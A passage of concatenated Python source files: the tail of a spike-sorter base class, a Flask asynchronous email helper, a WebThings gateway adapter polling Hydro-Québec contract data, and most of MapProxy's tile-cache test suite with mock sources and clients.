raise NotImplementedError def _run(self, recording, output_folder): # need be iplemented in subclass # this run the sorter on ONE recording (or SubExtractor) # this must run or generate the command line to run the sorter for one recording raise NotImplementedError @staticmethod def get_result_from_folder(output_folder): raise NotImplementedError def get_result_list(self): sorting_list = [] for i, _ in enumerate(self.recording_list): sorting = self.get_result_from_folder(self.output_folders[i]) sorting_list.append(sorting) return sorting_list def get_result(self): sorting_list = self.get_result_list() if len(sorting_list) == 1: sorting = sorting_list[0] else: for i, sorting in enumerate(sorting_list): property_name = self.recording_list[i].get_channel_property(self.recording_list[i].get_channel_ids()[0], self.grouping_property) if sorting is not None: for unit in sorting.get_unit_ids(): sorting.set_unit_property(unit, self.grouping_property, property_name) # reassemble the sorting outputs sorting_list = [sort for sort in sorting_list if sort is not None] multi_sorting = se.MultiSortingExtractor(sortings=sorting_list) sorting = multi_sorting if self.delete_folders: for out in self.output_folders: if self.verbose: print("Removing ", str(out)) shutil.rmtree(str(out), ignore_errors=True) sorting.set_sampling_frequency(self.recording_list[0].get_sampling_frequency()) return sorting def _check_json(d): # quick hack to ensure json writable for k, v in d.items(): if isinstance(v, Path): d[k] = str(v) elif isinstance(v, (np.int, np.int32, np.int64)): d[k] = int(v) elif isinstance(v, (np.float, np.float32, np.float64)): d[k] = float(v) elif isinstance(v, datetime.datetime): d[k] = v.isoformat() return d
email.py
#!/usr/bin/python # -*- coding: utf-8 -*- from threading import Thread from flask import current_app, render_template from flask.ext.mail import Message from . import mail def send_async_email(app, msg): with app.app_context(): mail.send(msg) def send_email(to, subject, template, **kwargs): app = current_app._get_current_object() msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to]) msg.body = render_template(template + '.txt', **kwargs) msg.html = render_template(template + '.html', **kwargs) thr = Thread(target=send_async_email, args=[app, msg]) thr.start() return thr
hq_adapter.py
"""adapter for webthings gateway""" import functools from gateway_addon import Adapter, Database import time import asyncio from threading import Thread from pkg.hq_device import hq_Device print = functools.partial(print, flush=True)#allow direct print to log of gateway _TIMEOUT = 3 _POLL = 30 class hq_Adapter(Adapter): """ Adapter for the HQ program """ def __init__(self): """Initialize the object""" self.name = self.__class__.__name__ _id = 'webtio-hydroqc-addon' package_name = _id self.config = self.load_db_config(_id)#load config from DB self.verbose = self.config["debug_mode"] super().__init__(_id, package_name, self.verbose) if not self.config: print("Can't load config from Database") return self.pairing=False self.start_pairing(_TIMEOUT) self.async_main() def start_pairing(self, timeout): """Start pairing process""" if self.pairing: return self.pairing = True #create a device for each contract in config for contract in self.config['contracts']: device = hq_Device(self, "hydroqc-{0}".format(contract['name']), contract) self.handle_device_added(device) if self.verbose: print("Start Pairing") time.sleep(timeout) self.pairing = False def cancel_pairing(self): """Cancel the pairing process""" self.pairing = False def load_db_config(self, package_name): """ Load configuration from DB package_name -- name of the package as shown in the manifest.json Return the config object as dict """ database = Database(package_name) if not database.open(): print("Can't open database for package: {0}".format(package_name)) return configs = database.load_config() database.close() return configs def async_main(self): """main async loop""" if self.verbose: print("Starting Loops") t = Thread(target=self.small_loop) t.start() big_loop = asyncio.new_event_loop() t = Thread(target=self.start_loop, args=(big_loop,)) t.start() asyncio.run_coroutine_threadsafe(self.big_loop(), big_loop) """ self.config['sync_frequency'] = 10 asyncio.run(self.big_loop())""" def small_loop(self): """ Looping 
to update data needed frequently """ while True: if self.verbose: print("Small Loop") if not self.get_devices(): pass for device in self.get_devices(): updatedDevice = self.get_device(device) updatedDevice.update_calculated_property() time.sleep(_POLL) def start_loop(self, loop): """ start an async loop """ asyncio.set_event_loop(loop) loop.run_forever() async def big_loop(self): """ loop to update HQ data, 3 to 4 time a day is enough """ while True: if self.verbose: print("Big Loop") if not self.get_devices(): pass for device in self.get_devices(): device = self.get_device(device) await device.init_session() await device.get_data() device.update_hq_datas() time.sleep(self.config['sync_frequency'])
test_cache.py
# This file is part of the MapProxy project. # Copyright (C) 2010 Omniscale <http://omniscale.de> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import base64 import os import re import shutil import tempfile import threading import time from io import BytesIO from collections import defaultdict import pytest from mapproxy.cache.base import TileLocker from mapproxy.cache.file import FileCache from mapproxy.cache.tile import Tile, TileManager from mapproxy.client.http import HTTPClient from mapproxy.client.wms import WMSClient from mapproxy.compat.image import Image from mapproxy.grid import TileGrid, resolution_range from mapproxy.image import ImageSource from mapproxy.image.opts import ImageOptions from mapproxy.layer import ( BlankImage, CacheMapLayer, DirectMapLayer, MapBBOXError, MapExtent, MapLayer, MapQuery, ResolutionConditional, SRSConditional, ) from mapproxy.request.wms import WMS111MapRequest from mapproxy.source import InvalidSourceQuery, SourceError from mapproxy.source.tile import TiledSource from mapproxy.source.wms import WMSSource from mapproxy.srs import SRS from mapproxy.test.http import assert_query_eq, wms_query_eq, query_eq, mock_httpd from mapproxy.test.image import create_debug_img, is_png, tmp_image from mapproxy.util.coverage import BBOXCoverage TEST_SERVER_ADDRESS = ('127.0.0.1', 56413) GLOBAL_GEOGRAPHIC_EXTENT = MapExtent((-180, -90, 180, 90), SRS(4326)) tmp_lock_dir = None def setup(): global tmp_lock_dir tmp_lock_dir = tempfile.mkdtemp() def 
teardown(): shutil.rmtree(tmp_lock_dir) class counting_set(object): def __init__(self, items): self.data = defaultdict(int) for item in items: self.data[item] += 1 def add(self, item): self.data[item] += 1 def __repr__(self): return 'counting_set(%r)' % dict(self.data) def __eq__(self, other): return self.data == other.data class MockTileClient(object): def __init__(self): self.requested_tiles = [] def get_tile(self, tile_coord, format=None): self.requested_tiles.append(tile_coord) return ImageSource(create_debug_img((256, 256))) class TestTiledSourceGlobalGeodetic(object): def setup(self): self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) self.client = MockTileClient() self.source = TiledSource(self.grid, self.client) def test_match(self): self.source.get_map(MapQuery([-180, -90, 0, 90], (256, 256), SRS(4326))) self.source.get_map(MapQuery([0, -90, 180, 90], (256, 256), SRS(4326))) assert self.client.requested_tiles == [(0, 0, 1), (1, 0, 1)] def test_wrong_size(self): with pytest.raises(InvalidSourceQuery): self.source.get_map(MapQuery([-180, -90, 0, 90], (512, 256), SRS(4326))) def test_wrong_srs(self): with pytest.raises(InvalidSourceQuery): self.source.get_map(MapQuery([-180, -90, 0, 90], (512, 256), SRS(4326))) class MockFileCache(FileCache): def __init__(self, *args, **kw): super(MockFileCache, self).__init__(*args, **kw) self.stored_tiles = set() self.loaded_tiles = counting_set([]) def store_tile(self, tile, dimensions=None): assert tile.coord not in self.stored_tiles self.stored_tiles.add(tile.coord) if self.cache_dir != '/dev/null': FileCache.store_tile(self, tile) def load_tile(self, tile, with_metadata=False, dimensions=None): self.loaded_tiles.add(tile.coord) return FileCache.load_tile(self, tile, with_metadata) def is_cached(self, tile, dimensions=None): return tile.coord in self.stored_tiles def create_cached_tile(tile, cache, timestamp=None): loc = cache.tile_location(tile, create_dir=True) with open(loc, 'wb') as f: f.write(b'foo') if 
timestamp: os.utime(loc, (timestamp, timestamp)) @pytest.fixture def file_cache(tmpdir): return FileCache(cache_dir=tmpdir.join('cache').strpath, file_ext='png') @pytest.fixture def tile_locker(tmpdir): return TileLocker(tmpdir.join('lock').strpath, 10, "id") @pytest.fixture def mock_tile_client(): return MockTileClient() @pytest.fixture def mock_file_cache(): return MockFileCache('/dev/null', 'png') class TestTileManagerStaleTiles(object): @pytest.fixture def tile_mgr(self, file_cache, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) client = MockTileClient() source = TiledSource(grid, client) tile_mgr = TileManager(grid, file_cache, [source], 'png', locker=tile_locker) return tile_mgr def test_is_stale_missing(self, tile_mgr): assert not tile_mgr.is_stale(Tile((0, 0, 1))) def test_is_stale_not_expired(self, tile_mgr, file_cache): create_cached_tile(Tile((0, 0, 1)), file_cache) assert not tile_mgr.is_stale(Tile((0, 0, 1))) def test_is_stale_expired(self, tile_mgr, file_cache): create_cached_tile(Tile((0, 0, 1)), file_cache, timestamp=time.time()-3600) tile_mgr._expire_timestamp = time.time() assert tile_mgr.is_stale(Tile((0, 0, 1))) class TestTileManagerRemoveTiles(object): @pytest.fixture def tile_mgr(self, file_cache, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) client = MockTileClient() source = TiledSource(grid, client) image_opts = ImageOptions(format='image/png') return TileManager(grid, file_cache, [source], 'png', image_opts=image_opts, locker=tile_locker) def test_remove_missing(self, tile_mgr): tile_mgr.remove_tile_coords([(0, 0, 0), (0, 0, 1)]) def test_remove_existing(self, tile_mgr, file_cache): create_cached_tile(Tile((0, 0, 1)), file_cache) assert tile_mgr.is_cached(Tile((0, 0, 1))) tile_mgr.remove_tile_coords([(0, 0, 0), (0, 0, 1)]) assert not tile_mgr.is_cached(Tile((0, 0, 1))) class TestTileManagerTiledSource(object): @pytest.fixture def tile_mgr(self, tile_locker, mock_file_cache, mock_tile_client): grid 
= TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source = TiledSource(grid, mock_tile_client) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source], 'png', image_opts=image_opts, locker=tile_locker, ) def test_create_tiles(self, tile_mgr, mock_file_cache, mock_tile_client): tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert sorted(mock_tile_client.requested_tiles) == [(0, 0, 1), (1, 0, 1)] class TestTileManagerDifferentSourceGrid(object): @pytest.fixture def tile_mgr(self, mock_file_cache, mock_tile_client, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source_grid = TileGrid(SRS(4326), bbox=[0, -90, 180, 90]) source = TiledSource(source_grid, mock_tile_client) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source], 'png', image_opts=image_opts, locker=tile_locker, ) def test_create_tiles(self, tile_mgr, mock_file_cache, mock_tile_client): tile_mgr.creator().create_tiles([Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(1, 0, 1)]) assert mock_tile_client.requested_tiles == [(0, 0, 0)] def test_create_tiles_out_of_bounds(self, tile_mgr): with pytest.raises(InvalidSourceQuery): tile_mgr.creator().create_tiles([Tile((0, 0, 0))]) class MockSource(MapLayer): def __init__(self, *args): MapLayer.__init__(self, *args) self.requested = [] def _image(self, size): return create_debug_img(size) def get_map(self, query): self.requested.append((query.bbox, query.size, query.srs)) return ImageSource(self._image(query.size)) @pytest.fixture def mock_source(): return MockSource() class TestTileManagerSource(object): @pytest.fixture def tile_mgr(self, mock_file_cache, mock_source, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [mock_source], 'png', 
image_opts=image_opts, locker=tile_locker, ) def test_create_tile(self, tile_mgr, mock_file_cache, mock_source): tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert sorted(mock_source.requested) == \ [((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326)), ((0.0, -90.0, 180.0, 90.0), (256, 256), SRS(4326))] class MockWMSClient(object): def __init__(self): self.requested = [] def retrieve(self, query, format): self.requested.append((query.bbox, query.size, query.srs)) return create_debug_img(query.size) @pytest.fixture def mock_wms_client(): return MockWMSClient() class TestTileManagerWMSSource(object): @pytest.fixture def tile_mgr(self, mock_file_cache, tile_locker, mock_wms_client): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source = WMSSource(mock_wms_client) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source], 'png', meta_size=[2, 2], meta_buffer=0, image_opts=image_opts, locker=tile_locker, ) def test_same_lock_for_meta_tile(self, tile_mgr): assert tile_mgr.lock(Tile((0, 0, 1))).lock_file == \ tile_mgr.lock(Tile((1, 0, 1))).lock_file def test_locks_for_meta_tiles(self, tile_mgr): assert tile_mgr.lock(Tile((0, 0, 2))).lock_file != \ tile_mgr.lock(Tile((2, 0, 2))).lock_file def test_create_tile_first_level(self, tile_mgr, mock_file_cache, mock_wms_client): tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert mock_wms_client.requested == \ [((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))] def test_create_tile(self, tile_mgr, mock_file_cache, mock_wms_client): tile_mgr.creator().create_tiles([Tile((0, 0, 2))]) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2)]) assert sorted(mock_wms_client.requested) == \ [((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326))] def test_create_tiles(self, 
tile_mgr, mock_file_cache, mock_wms_client): tile_mgr.creator().create_tiles([Tile((0, 0, 2)), Tile((2, 0, 2))]) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2), (2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]) assert sorted(mock_wms_client.requested) == \ [((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326)), ((0.0, -90.0, 180.0, 90.0), (512, 512), SRS(4326))] def test_load_tile_coords(self, tile_mgr, mock_file_cache, mock_wms_client): tiles = tile_mgr.load_tile_coords(((0, 0, 2), (2, 0, 2))) assert tiles[0].coord == (0, 0, 2) assert isinstance(tiles[0].source, ImageSource) assert tiles[1].coord == (2, 0, 2) assert isinstance(tiles[1].source, ImageSource) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2), (2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]) assert sorted(mock_wms_client.requested) == \ [((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326)), ((0.0, -90.0, 180.0, 90.0), (512, 512), SRS(4326))] class TestTileManagerWMSSourceConcurrent(TestTileManagerWMSSource): @pytest.fixture def tile_mgr(self, mock_file_cache, tile_locker, mock_wms_client): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source = WMSSource(mock_wms_client) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source], 'png', meta_size=[2, 2], meta_buffer=0, image_opts=image_opts, locker=tile_locker, concurrent_tile_creators=2, ) class TestTileManagerWMSSourceMinimalMetaRequests(object): @pytest.fixture def tile_mgr(self, mock_file_cache, mock_wms_client, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source = WMSSource(mock_wms_client) return TileManager(grid, mock_file_cache, [source], 'png', meta_size=[2, 2], meta_buffer=10, minimize_meta_requests=True, locker=tile_locker, ) def test_create_tile_single(self, tile_mgr, mock_file_cache, mock_wms_client): # not enabled for single tile requests tile_mgr.creator().create_tiles([Tile((0, 0, 2))]) assert 
mock_file_cache.stored_tiles == \ set([(0, 0, 2), (0, 1, 2), (1, 0, 2), (1, 1, 2)]) assert sorted(mock_wms_client.requested) == \ [((-180.0, -90.0, 3.515625, 90.0), (522, 512), SRS(4326))] def test_create_tile_multiple(self, tile_mgr, mock_file_cache, mock_wms_client): tile_mgr.creator().create_tiles([Tile((4, 0, 3)), Tile((4, 1, 3)), Tile((4, 2, 3))]) assert mock_file_cache.stored_tiles == \ set([(4, 0, 3), (4, 1, 3), (4, 2, 3)]) assert sorted(mock_wms_client.requested) == \ [((-1.7578125, -90, 46.7578125, 46.7578125), (276, 778), SRS(4326))] def test_create_tile_multiple_fragmented(self, tile_mgr, mock_file_cache, mock_wms_client): tile_mgr.creator().create_tiles([Tile((4, 0, 3)), Tile((5, 2, 3))]) assert mock_file_cache.stored_tiles == \ set([(4, 0, 3), (4, 1, 3), (4, 2, 3), (5, 0, 3), (5, 1, 3), (5, 2, 3)]) assert sorted(mock_wms_client.requested) == \ [((-1.7578125, -90, 91.7578125, 46.7578125), (532, 778), SRS(4326))] class SlowMockSource(MockSource): supports_meta_tiles = True def get_map(self, query): time.sleep(0.1) return MockSource.get_map(self, query) class TestTileManagerLocking(object): @pytest.fixture def slow_source(self): return SlowMockSource() @pytest.fixture def mock_file_cache(self, tmpdir): return MockFileCache(tmpdir.strpath, 'png') @pytest.fixture def tile_mgr(self, mock_file_cache, slow_source, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [slow_source], 'png', meta_size=[2, 2], meta_buffer=0, image_opts=image_opts, locker=tile_locker, ) def test_get_single(self, tile_mgr, mock_file_cache, slow_source): tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert slow_source.requested == \ [((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))] def test_concurrent(self, tile_mgr, mock_file_cache, slow_source): def do_it(): 
tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) threads = [threading.Thread(target=do_it) for _ in range(3)] [t.start() for t in threads] [t.join() for t in threads] assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert mock_file_cache.loaded_tiles == counting_set([(0, 0, 1), (1, 0, 1), (0, 0, 1), (1, 0, 1)]) assert slow_source.requested == \ [((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))] assert os.path.exists(mock_file_cache.tile_location(Tile((0, 0, 1)))) class TestTileManagerMultipleSources(object): @pytest.fixture def source_base(self): return MockSource() @pytest.fixture def source_overlay(self): return MockSource() @pytest.fixture def tile_mgr(self, mock_file_cache, tile_locker, source_base, source_overlay): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source_base, source_overlay], 'png', image_opts=image_opts, locker=tile_locker, ) def test_get_single(self, tile_mgr, mock_file_cache, source_base, source_overlay): tile_mgr.creator().create_tiles([Tile((0, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1)]) assert source_base.requested == \ [((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326))] assert source_overlay.requested == \ [((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326))] class SolidColorMockSource(MockSource): def __init__(self, color='#ff0000'): MockSource.__init__(self) self.color = color def _image(self, size): return Image.new('RGB', size, self.color) class TestTileManagerMultipleSourcesWithMetaTiles(object): @pytest.fixture def source_base(self): src = SolidColorMockSource(color='#ff0000') src.supports_meta_tiles = True return src @pytest.fixture def source_overlay(self): src = MockSource() src.supports_meta_tiles = True return src @pytest.fixture def tile_mgr(self, mock_file_cache, tile_locker, source_base, source_overlay): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) 
image_opts = ImageOptions(format='image/png') return TileManager(grid, mock_file_cache, [source_base, source_overlay], 'png', image_opts=image_opts, meta_size=[2, 2], meta_buffer=0, locker=tile_locker, ) def test_merged_tiles(self, tile_mgr, mock_file_cache, source_base, source_overlay): tiles = tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))]) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert source_base.requested == \ [((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))] assert source_overlay.requested == \ [((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))] hist = tiles[0].source.as_image().histogram() # lots of red (base), but not everything (overlay) assert 55000 < hist[255] < 60000 # red = 0xff assert 55000 < hist[256] # green = 0x00 assert 55000 < hist[512] # blue = 0x00 def test_sources_with_mixed_support_for_meta_tiles(self, mock_file_cache, source_base, source_overlay, tile_locker): source_base.supports_meta_tiles = False grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) with pytest.raises(ValueError): TileManager(grid, file_cache, [source_base, source_overlay], 'png', meta_size=[2, 2], meta_buffer=0, locker=tile_locker) def test_sources_with_no_support_for_meta_tiles(self, mock_file_cache, source_base, source_overlay, tile_locker): source_base.supports_meta_tiles = False source_overlay.supports_meta_tiles = False grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) tile_mgr = TileManager(grid, mock_file_cache, [source_base, source_overlay], 'png', meta_size=[2, 2], meta_buffer=0, locker=tile_locker) assert tile_mgr.meta_grid is None class TestTileManagerBulkMetaTiles(object): @pytest.fixture def source_base(self): src = SolidColorMockSource(color='#ff0000') src.supports_meta_tiles = False return src @pytest.fixture def source_overlay(self): src = MockSource() src.supports_meta_tiles = False return src @pytest.fixture def tile_mgr(self, mock_file_cache, source_base, source_overlay, tile_locker): grid = 
TileGrid(SRS(4326), bbox=[-180, -90, 180, 90], origin='ul') return TileManager(grid, mock_file_cache, [source_base, source_overlay], 'png', meta_size=[2, 2], meta_buffer=0, locker=tile_locker, bulk_meta_tiles=True, ) def test_bulk_get(self, tile_mgr, mock_file_cache, source_base, source_overlay): tiles = tile_mgr.creator().create_tiles([Tile((0, 0, 2))]) assert len(tiles) == 2*2 assert mock_file_cache.stored_tiles == set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2)]) for requested in [source_base.requested, source_overlay.requested]: assert set(requested) == set([ ((-180.0, 0.0, -90.0, 90.0), (256, 256), SRS(4326)), ((-90.0, 0.0, 0.0, 90.0), (256, 256), SRS(4326)), ((-180.0, -90.0, -90.0, 0.0), (256, 256), SRS(4326)), ((-90.0, -90.0, 0.0, 0.0), (256, 256), SRS(4326)), ]) def test_bulk_get_error(self, tile_mgr, source_base): tile_mgr.sources = [source_base, ErrorSource()] try: tile_mgr.creator().create_tiles([Tile((0, 0, 2))]) except Exception as ex: assert ex.args[0] == "source error" def test_bulk_get_multiple_meta_tiles(self, tile_mgr, mock_file_cache): tiles = tile_mgr.creator().create_tiles([Tile((1, 0, 2)), Tile((2, 0, 2))]) assert len(tiles) == 2*2*2 assert mock_file_cache.stored_tiles, set([ (0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2), (2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2), ]) class TestTileManagerBulkMetaTilesConcurrent(TestTileManagerBulkMetaTiles): @pytest.fixture def tile_mgr(self, mock_file_cache, source_base, source_overlay, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90], origin='ul') return TileManager( grid, mock_file_cache, [source_base, source_overlay], 'png', meta_size=[2, 2], meta_buffer=0, locker=tile_locker, bulk_meta_tiles=True, concurrent_tile_creators=2, ) class ErrorSource(MapLayer): def __init__(self, *args): MapLayer.__init__(self, *args) self.requested = [] def get_map(self, query): self.requested.append((query.bbox, query.size, query.srs)) raise Exception("source error") default_image_opts = 
ImageOptions(resampling='bicubic') class TestCacheMapLayer(object): @pytest.fixture def layer(self, mock_file_cache, mock_wms_client, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) source = WMSSource(mock_wms_client) image_opts = ImageOptions(resampling='nearest') tile_mgr = TileManager(grid, mock_file_cache, [source], 'png', meta_size=[2, 2], meta_buffer=0, image_opts=image_opts, locker=tile_locker) return CacheMapLayer(tile_mgr, image_opts=default_image_opts) def test_get_map_small(self, layer, mock_file_cache): result = layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png')) assert mock_file_cache.stored_tiles == set([(0, 0, 1), (1, 0, 1)]) assert result.size == (300, 150) def test_get_map_large(self, layer, mock_file_cache): # gets next resolution layer result = layer.get_map(MapQuery((-180, -90, 180, 90), (600, 300), SRS(4326), 'png')) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2), (2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]) assert result.size == (600, 300) def test_transformed(self, layer, mock_file_cache): result = layer.get_map(MapQuery( (-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913), 'png')) assert mock_file_cache.stored_tiles == \ set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2), (2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]) assert result.size == (500, 500) def test_single_tile_match(self, layer, mock_file_cache): result = layer.get_map(MapQuery( (0.001, 0, 90, 90), (256, 256), SRS(4326), 'png', tiled_only=True)) assert mock_file_cache.stored_tiles == \ set([(3, 0, 2), (2, 0, 2), (3, 1, 2), (2, 1, 2)]) assert result.size == (256, 256) def test_single_tile_no_match(self, layer): with pytest.raises(MapBBOXError): layer.get_map( MapQuery((0.1, 0, 90, 90), (256, 256), SRS(4326), 'png', tiled_only=True) ) def test_get_map_with_res_range(self, mock_file_cache, mock_wms_client, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) 
res_range = resolution_range(1000, 10) source = WMSSource(mock_wms_client, res_range=res_range) image_opts = ImageOptions(resampling='nearest') tile_mgr = TileManager(grid, mock_file_cache, [source], 'png', meta_size=[2, 2], meta_buffer=0, image_opts=image_opts, locker=tile_locker) layer = CacheMapLayer(tile_mgr, image_opts=default_image_opts) with pytest.raises(BlankImage): result = layer.get_map(MapQuery( (-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913), 'png')) assert mock_file_cache.stored_tiles == set() result = layer.get_map(MapQuery( (0, 0, 10000, 10000), (50, 50), SRS(900913), 'png')) assert mock_file_cache.stored_tiles == \ set([(512, 257, 10), (513, 256, 10), (512, 256, 10), (513, 257, 10)]) assert result.size == (50, 50) class TestCacheMapLayerWithExtent(object): @pytest.fixture def source(self, mock_wms_client): return WMSSource(mock_wms_client) @pytest.fixture def layer(self, mock_file_cache, source, tile_locker): grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90]) image_opts = ImageOptions(resampling='nearest', format='png') tile_mgr = TileManager(grid, mock_file_cache, [source], 'png', meta_size=[1, 1], meta_buffer=0, image_opts=image_opts, locker=tile_locker) layer = CacheMapLayer(tile_mgr, image_opts=default_image_opts) layer.extent = BBOXCoverage([0, 0, 90, 45], SRS(4326)).extent return layer def test_get_outside_extent(self, layer): with pytest.raises(BlankImage): layer.get_map(MapQuery((-180, -90, 0, 0), (300, 150), SRS(4326), 'png')) def test_get_map_small(self, layer, mock_file_cache, mock_wms_client): result = layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png')) assert mock_file_cache.stored_tiles == set([(1, 0, 1)]) # source requests one tile (no meta-tiling configured) assert mock_wms_client.requested == [((0.0, -90.0, 180.0, 90.0), (256, 256), SRS('EPSG:4326'))] assert result.size == (300, 150) def test_get_map_small_with_source_extent(self, source, layer, mock_file_cache, 
mock_wms_client): source.extent = BBOXCoverage([0, 0, 90, 45], SRS(4326)).extent result = layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png')) assert mock_file_cache.stored_tiles == set([(1, 0, 1)]) # source requests one tile (no meta-tiling configured) limited to source.extent assert mock_wms_client.requested == [((0, 0, 90, 45), (128, 64), (SRS(4326)))] assert result.size == (300, 150) class TestDirectMapLayer(object): @pytest.fixture def layer(self, mock_wms_client): source = WMSSource(mock_wms_client) return DirectMapLayer(source, GLOBAL_GEOGRAPHIC_EXTENT) def test_get_map(self, layer, mock_wms_client): result = layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png')) assert mock_wms_client.requested == [((-180, -90, 180, 90), (300, 150), SRS(4326))] assert result.size == (300, 150) def test_get_map_mercator(self, layer, mock_wms_client): result = layer.get_map(MapQuery( (-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913), 'png')) assert mock_wms_client.requested == \ [((-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913))] assert result.size == (500, 500) class TestDirectMapLayerWithSupportedSRS(object): @pytest.fixture def layer(self, mock_wms_client): source = WMSSource(mock_wms_client) return DirectMapLayer(source, GLOBAL_GEOGRAPHIC_EXTENT) def test_get_map(self, layer, mock_wms_client): result = layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png')) assert mock_wms_client.requested == [((-180, -90, 180, 90), (300, 150), SRS(4326))] assert result.size == (300, 150) def test_get_map_mercator(self, layer, mock_wms_client): result = layer.get_map(MapQuery( (-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913), 'png')) assert mock_wms_client.requested == \ [((-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500), SRS(900913))] assert result.size == (500, 500) class MockHTTPClient(object): def __init__(self): 
